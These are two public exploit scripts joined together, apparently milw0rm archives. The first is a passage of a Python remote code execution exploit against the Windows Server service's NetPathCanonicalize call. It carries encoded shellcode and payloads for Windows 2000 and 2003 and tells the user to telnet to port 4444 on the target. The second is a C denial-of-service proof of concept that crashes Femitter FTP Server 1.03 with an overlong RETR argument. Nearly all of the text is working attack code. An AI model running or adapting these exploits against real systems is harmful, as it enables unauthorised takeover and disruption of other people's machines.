shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
# Payload selection happens here at module level, before the argument check
# in the __main__ block below runs: a missing second argument raises
# IndexError on the next line instead of printing the usage text.
if sys.argv[2]=='1': #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
# Any value other than '1' or '2' leaves `payload` unbound; the NameError
# then surfaces later, when SRVSVC_Exploit.__DCEPacket appends it to the stub.
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
    """One connection to the target's SRVSVC named pipe, run as a Thread.

    ``run`` builds a NetPathCanonicalize request stub from the module-level
    ``shellcode`` and ``payload`` strings and issues it exactly once.  The
    Thread base class is only used so that a caller could run several
    instances side by side; this script starts a single one.
    """

    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        # Stored but never read: the endpoint string built in __DCEPacket
        # carries no port, and osver is only consulted at module level.
        self.__port = port
        self.target = target
        self.osver = osver

    def __DCEPacket(self):
        """Connect, bind to the SRVSVC interface and assemble ``self.__stub``.

        Returns nothing; the prepared stub and the bound DCERPC object are
        left in ``self.__stub`` and ``self.__dce`` for ``run``.
        """
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        # Constructing Malicious Packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        # `payload` is the module-level variable chosen from sys.argv[2];
        # it is unbound (NameError here) when that argument was not '1' or '2'.
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00'
        return

    def run(self):
        """Thread body: build the stub, send it once, print the closing hint.

        No response is read and no exception is handled here; a failure in
        the transport or the call propagates out of the thread.
        """
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
    # Script entry point: reads the two positional arguments and starts one
    # SRVSVC_Exploit thread.  Note that sys.argv[2] is already dereferenced
    # at module level during payload selection, so for a missing second
    # argument the IndexError is raised there and this usage text never
    # prints; the guard below only covers the case where argv[1] is present
    # and argv[2] is not reached, which cannot happen in this file's order.
    try:
        target = sys.argv[1]
        osver = sys.argv[2]
    except IndexError:
        print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
        print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
        print 'Select OS Version'
        print '[-]Windows 2000: OS Version = 1'
        print '[-]Windows 2003[SP2]: OS Version = 2'
        sys.exit(-1)
    current = SRVSVC_Exploit(target, osver)
    current.start()
    #print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]
LiquidWorm/Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC ( php)
/*0-----------------------------------------------------------------------------------0*\
0 0
| |
| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC |
| |
| Summary: Femitter Server is an easy-to use HTTP and FTP server application |
| for Windows which allows you to use your own computer for sharing gigabytes |
| of files with your friends and colleagues. |
| |
| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability |
| and memory corruption that causes the application to crash. When we send to |
| the RETR command an argument like AAAA:AAAA or an overly long string of As |
| (1024), the server crashes instantly. Also, when typing into browser: |
| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), |
| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at |
| address 004A218A in module "fem.exe". Write of address 00000000. |
| |
| Product web page: http://acritum.com/fem/index.htm |
| |
| Tested on Microsoft Windows XP SP2 (English) |
| |
| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic |
| |
| liquidworm [t00t] gmail.com |
| |
| http://www.zeroscience.org/ |
| |
| 17.09.2008 |
| |
0 0
\*0-----------------------------------------------------------------------------------0*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"
void header(void);
/*
 * Entry point: connects to [ip]:[port], logs in with the hard-coded
 * credentials below (there is no option to supply others), and sends one
 * oversized RETR line, then closes the socket.
 *
 * Returns EXIT_SUCCESS on a usage error (argc != 3), 1 when socket() or
 * connect() fails, 0 otherwise.  The return values of the two write()
 * calls and of send() are not checked, so a short or failed write is
 * reported as success by the printf() that follows it.
 *
 * NOTE(review): inet_addr() and htons() are declared in <arpa/inet.h>,
 * which is not among the includes; on platforms where <netinet/in.h> does
 * not pull it in this relies on implicit declarations.  inet_addr() is
 * also unchecked: a non-numeric argv[1] yields INADDR_NONE and the error
 * only surfaces from connect().
 */
int main (int argc, char *argv[])
{
	int sckt = 0, sfd = 0;
	char user[] = "USER admin\r\n";
	char pass[] = "PASS nimda\r\n";
	/* "RETR " followed by 1024-odd 'A's and CRLF; the unused MANA macro
	 * above holds the shorter "AAAA:AAAA" variant from the description. */
	unsigned char payload[]=
	"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\xD\xA";
	header();
	if(argc != 3)
	{
		printf("\nUsage: %s [ip] [port]\n\n", argv[0]);
		return (EXIT_SUCCESS);
	}
	struct sockaddr_in dos_ftp;
	sfd = socket(AF_INET, SOCK_STREAM, 0);
	if(sfd < 0)
	{
		perror("Socket");
		printf("Error creating socket...\n");
		return(1);
	}
	printf("\n\n[+] Socket created!\n");
	sleep (1);
	memset(&dos_ftp, 0x0, sizeof(dos_ftp));
	dos_ftp.sin_family = AF_INET;
	dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
	dos_ftp.sin_port = htons(atoi(argv[2]));
	sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));
	if(sckt < 0)
	{
		perror("Connect");
		printf("Error connecting...\n");
		return(1);
	}
	printf("[+] Connection established!\n");
	sleep (1);
	/* No server reply is read between commands; the sleeps are the only
	 * pacing between USER, PASS and the RETR line. */
	write(sfd, user, strlen(user)); // username
	printf("[+] Sending CMD: %s\n", user);
	sleep (2);
	write(sfd, pass, strlen(pass)); // password
	printf("[+] Sending CMD: %s\n", pass);
	sleep (2);
	printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]);
	sleep(2);
	/* sizeof(payload) counts the string's terminating NUL, so one extra
	 * 0x00 byte is sent after the CRLF. */
	send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);
	printf("[+] Malicious buffer succesfully sent...\n");
	sleep (1);
	/* Printed unconditionally: nothing here verifies the server's state. */
	printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);
	close (sfd);
	return(0);
}
/*
 * Prints the PoC banner to stdout.  The text is emitted in one fputs()
 * call; the bytes written are identical to the original per-line printf()s.
 */
void header(void)
{
	static const char banner[] =
		"\n********************************************************************************\n\n"
		"\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n"
		"\t\t\tby LiquidWorm <liquidworm [t00t] gmail.com>\n\n"
		"********************************************************************************\n\n";
	fputs(banner, stdout);
}
// milw0rm.com [2008-09-17]